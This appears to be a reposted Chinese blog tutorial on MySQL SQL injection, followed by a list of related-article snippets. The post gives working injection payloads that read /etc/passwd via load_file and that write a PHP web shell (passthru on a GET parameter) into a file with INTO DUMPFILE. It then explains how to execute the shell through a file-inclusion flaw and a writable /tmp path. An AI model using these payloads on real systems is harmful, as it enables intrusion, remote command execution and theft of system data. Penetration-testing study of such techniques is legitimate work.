SQL注入——Mysql文件读取写入,结合文件包含漏洞

最新推荐文章于 2023-11-09 12:00:00 发布
最新推荐文章于 2023-11-09 12:00:00 发布
阅读量137 收藏
点赞数
文章标签: 数据库 php
原文链接:http://www.cnblogs.com/Tempt/p/11160294.html
版权
上篇主要概述了查询一些常见表格的方法 这里在增加一些查询的方式
读取文件:
'union select null,load_file('/etc/passwd')-- 
 
写入文件
结合上面,我们可以写入一个文件在目标路径
' union select null,"<?php passthru($_GET['cmd']); ?>" INTO DUMPFILE "a.php" --
这里的 <?php passthru($_GET['cmd']); ?>为我们要执行的命令,
INTODUMPPFILE为我们创建的一个文件a.php
但是这里我们写入的地址明显是 网页默认存放的路径,这个路径是无法执行,我们要做的就是讲文件放置可以执行的路径下,接着执行此php文件。
结合我们之前提过的文件包含漏洞,可以对其php文件进行存储加执行
在存储的路径选择上,tmp路径是不错的选择,此文件路径属于多个账号可以执行的路径
接着我们利用之前利用过的文件包含漏洞进行文件的执行
思路总结:利用系统的中间路径,将文件写入,然后利用其它漏洞将文件进行执行,这里结合了文件包含以及文件写入漏洞,漏洞利用成功
 
补充:如果我们需要将传输的文件以二进制的方式进行传输需要在kali中用
cat 目标文件 | xxd -ps | tr -d '\n'
xxd -ps转换为二进制,后面tr是将换行符去掉,将所有代码汇总为一行 

转载于:https://www.cnblogs.com/Tempt/p/11160294.html

weixin_30337251
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
5-sql注入文件读写
m0_62978778的博客
01-05 699
高版本的MYSQL添加了一个新的特性secure_file_priv,该选项限制了mysql导出文件的权限。一般可以与union中做为一个字段使用,查看config.php(即mysql的密码),apache配置…就是利用文件的读写权限进行注入,它可以写入一句话木马,也可以读取系统文件的敏感信息。outfile 后面不能接0x开头或者char转换以后的路径,只能是单引号路径。后面的路径可以是单引号,0x,char转换的字符。报错显示,遗留文件漏洞报错,平台配置文件等。代表只能对该路径下文件进行读写。
sql注入之高权限注入文件读写
小阿宁的猫猫
09-12 738
高权限注入-- 1.多个网站共享mysql服务器-- 2.MySQL 权限介绍-- 3.注入流程-- 查询所有数据库名称-- 查询表名对应的字段名-- 查询数据-- 文件读写-- 1.文件读写注入的原理-- 2.文件读写注入的条件-- 3.读取文件-- 4.写入文件--
SQL注入详解(主要针对MySQL)
Rockboy777的博客
08-09 468
权限不足时也受影响;join绕过,如:union select 1,2,3 -> union select from (select 1)a join (select 2) join (select 3)substr()和mid()使用from for,如substr(database() from 1 for 1)表示将字符串从1位置截取长度1,mid()同理。
SQL注入篇——文件读写注入
爱国小白帽
02-10 4113
文件读写注入的原理 就是利用文件的读写权限进行注入 文件读写注入的条件 1、读写文件需要secure_file_priv权限 secure_file_priv= 代表对文件读写没有限制 2.secure_file_priv=NULL 代表不能进行文件读写 secure_file_priv=d:/phpstudy/mysql/data 代表只能对该路径下文件进行读写 2、知道网站绝对路径 Wi...
常见WEB漏洞原理分析
最新发布
m0_59598029的博客
11-09 96
从时代发展的角度看,网络安全的知识是学不完的,而且以后要学的会更多,同学们要摆正心态,既然选择入门网络安全,就不能仅仅只是入门程度而已,能力越强机会才越多。因为入门学习阶段知识点比较杂,所以我讲得比较笼统,大家如果有不懂的地方可以找我咨询,我保证知无不言言无不尽,需要相关资料也可以找我要,我的网盘里一大堆资料都在吃灰呢。干货主要有:①1000+CTF历届题库(主流和经典的应该都有了)②CTF技术文档(最全中文版)③项目源码(四五十个有趣且经典的练手项目及源码)
c#简单实现mysql连接和文件写入写出
05-27
在界面上添加按钮,为每个操作(如连接数据库写入文件读取文件)分配事件处理器,然后在处理器中编写相应的代码。 通过以上步骤,你已经掌握了C#与MySQL的连接以及文件读写的基本操作。结合实际项目需求,可以...
Python3实现将本地JSON大数据文件写入MySQL数据库的方法
09-09
综上所述,Python3处理JSON大数据文件写入MySQL数据库的关键步骤包括:连接数据库、创建表、逐行读取JSON文件、解析数据、批量插入数据以及事务处理。这种逐行读取和事务处理的方法是处理大数据文件时的有效策略,...
python读取txt文件将数据导入mysql数据库
01-20
在测试的时候,需要造模拟数据,或者是将生产环境的数据导出到测试环境中去,本文记录通过python读取txt文件,并将数据导入mysql数据库 1、示例代码: import pymysql # 打开数据库连接 conn = pymysql.connect(host...
spark读取hbase数据,并使用spark sql保存到mysql
09-24
本示例将详细介绍如何使用 Spark 从 HBase 中读取数据,并通过 Spark SQL 将其存储到 MySQL 数据库中。 首先,让我们了解 Spark 与 HBase 的交互。Spark 提供了 `spark-hbase-connector` 库,允许我们方便地连接到 ...
C#在MySQL大量数据下的高效读取写入详解
09-01
最佳选择是直接使用原生的MySQL API,如`MySqlConnection`和`MySqlCommand`,结合`DataReader`进行高效读取。 3. **利用索引和DataReader**:使用索引提高查询速度,通过列索引而非列名获取数据,减少数据解析时间。...
sql注入介绍
qq_51331767的博客
02-17 686
SQL注入即是指web应用程序对用户输入数据的合法性没有判断或过滤不严,攻击者可以在web应用程序中事先定义好的查询语句的结尾上添加额外的SQL语句,在管理员不知情的情况下实现非法操作,以此来实现欺骗数据库服务器执行非授权的任意查询,从而进一步得到相应的数据信息。在原来的sql语句中插入payload,攻击者注入一段包含注释符的sql语句,将原来的语句的一部分注释,注释掉的部分语句不会被执行。即把sql命令插入到web的请求表单中,欺骗服务器,以此来获取服务器的数据和权限。把用户输入的数据当作代码执行。
SQL注入写入文件方法(获取webshell)
Goodric的博客
04-08 2589
1、当前数据库用户为 root 权限 2、知道当前网站的绝对路径 3、secure_file_priv 的参数必须为空或目录地址 4、PHP的 GPC 为 off状态;(魔术引号,GET,POST,Cookie)
SQL注入-文件读写】文件读取+写入:函数、使用方法
05-30 9002
SQL注入文件读写
SQL注入16】SQL漏洞利用之读写文件
Fighting_hawk的博客
02-22 4373
1. 对文件进行读写既收到文件系统对用户权限的制约、也收到数据库设置的制约。 2. 掌握利用SQL漏洞进行文件读写的方法。 3. 后续需要进一步了解如何获取网站根目录路径的方法。
Pikachu靶场之SQL注入、远程代码执行、文件包含漏洞
Jach1n
02-01 665
Pikachu靶场之SQL注入、远程代码执行、文件包含漏洞
SQL注入、XSS、XXE、CSRF、SSRF、越权漏洞文件上传、文件包含总结篇
m0_57379855的博客
03-23 5643
漏洞总结篇SQL注入修复过滤特殊字符修改php.in使用mysqli_real_escape_string()函数加固数据库方面加固管理方面 SQL注入 是指web应用程序对用户输入的数据的合法性没有判断或者没有严格的过滤,攻击者可以在web程序中把定义好的查询语句的结尾上添加额外的SQL语句,在管理员不知情的情况下实现非法操作,以此来实现欺骗数据库服务器执行非授权的任意查询,从而进一步得到相应的数据信息 就是使用某种手段,在原来的SQL语句基础上,添加一段恶意的SQL语句并执行,从而达到不被管理员允许的目
SQL注入-Mysql注入读写文件
qq_25899635的博客
05-22 7034
Mysql注入文件 mysql数据库在渗透测试过程中能够使用的功能还是比较多的,出了读取数据之外,还可以进行读写(但前提是权限足够)。 读文件前提: 1、用户权限足够高,尽量具有root权限。 2、secure_file_priv不为NULL Mysql文件读写函数 举例:select load_file(’/etc/hosts’) 上面的例子是有条件限制的: 1、必须有权限读取并且文件必须完...
SQL注入-文件操作
渗透笔记
01-13 5004
1.通过load_file()函数将文件内容爆出来 前提条件 1. 当前权限对该文件可读 2. 文件在该服务器上 3. 路径完整 4. 文件大小小于max_allowed_packet 5. 当前数据库用户有FILE权限 6. secure_file_priv的值为空,如果值为某目录,那么就只能对该目录的文件进行操作 SELEC
SQL注入文件写入(需要用户验证)
热门推荐
隐0士的博客
11-14 1万+
SQL注入文件写入(需要用户验证)解决方案说明 这个问题根据使用的数据库而有两种处理方案:数据库不为sqlserver 此问题是针对sql server数据库文件写入的攻击而产生的,如果使用的数据库不是sql server则可不必理会,可在appscan的扫描配置–>测试策略–>SQL注入–>SQL注入文件写入(需要用户验证)两个选项前面去掉打勾,这样appscan便不会做这样的扫描攻击,如下
SQL注入漏洞:揭秘服务器文件下载暴露攻击
在这一过程中,攻击者可能使用不同的技巧,如利用"load data infile"(MySQL)或"SA account"(Microsoft SQL Server)来读取写入服务器上的文件,甚至执行命令,以便获取更大的控制权。 文章还会涉及安全防范...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值